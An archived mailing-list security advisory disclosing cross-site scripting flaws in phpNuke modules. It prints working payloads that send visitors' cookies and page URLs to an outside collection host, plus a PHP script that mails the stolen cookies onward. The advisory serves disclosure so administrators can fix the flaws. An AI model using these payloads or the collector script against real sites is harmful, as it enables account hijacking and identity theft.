lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003401c293e4$92bece80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Multiple phpNuke Modules Vulnerable to Cross-Site Scripting

phpNuke Module Vulnerabilities Enable Identity Theft

Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft

Description

phpNuke is a popular, and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database.  Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges.  Gaining such privileges could likely assist
further compromise of the susceptible system.

I. Search Module Vulnerability

The search module of phpNuke applies absolutely no filtering at all when
returning the "Results for x..." page, and as a result is susceptible to
cross-site scripting via a simple query such as:

<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurph
y@...rr.com&ref="+document.URL+"cookie="+document.cookie;</SCRIPT>

II. Multiple Module Extended Tag Vulnerabilities

phpNuke does a decent job of stripping known malicious tags, but doesn't
take into account the fact that even "safe" tags can have malicious
properties.  This enables cross-site scripting against the PM module,
Discussion module, News module, etc. so basically any module that accepts
user input for an article, message, or comment, can be attacked with HTML
such as:

<B
STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fet
ch.php?email=mattmurphy@...rr.com&ref=\'+document.URL+\'cookie=\'+document.c
ookie'))">Bold text -- or an attack?</B>

<B
ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurp
hy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>

<B
ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=matt
murphy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Keep
Away!</B>

III. Exploit Script

<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>

Vendor Response

I've contacted www.phpnuke.org through a private message, but if anyone
knows a more reliable contact for them, please do use it, as this is not
likely the only route of contact.  I sent a PM to "nukelite" with an example
exploit in it.  I expect that future BETA releases will eliminate this
vulnerability.  I am submitting this to the list so that vulnerable
administrators may make the necessary revisions to prevent this
vulnerability.  The versions available for download on www.phpnuke.org as
well as the version deployed there, remains vulnerable at the time of this
writing.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ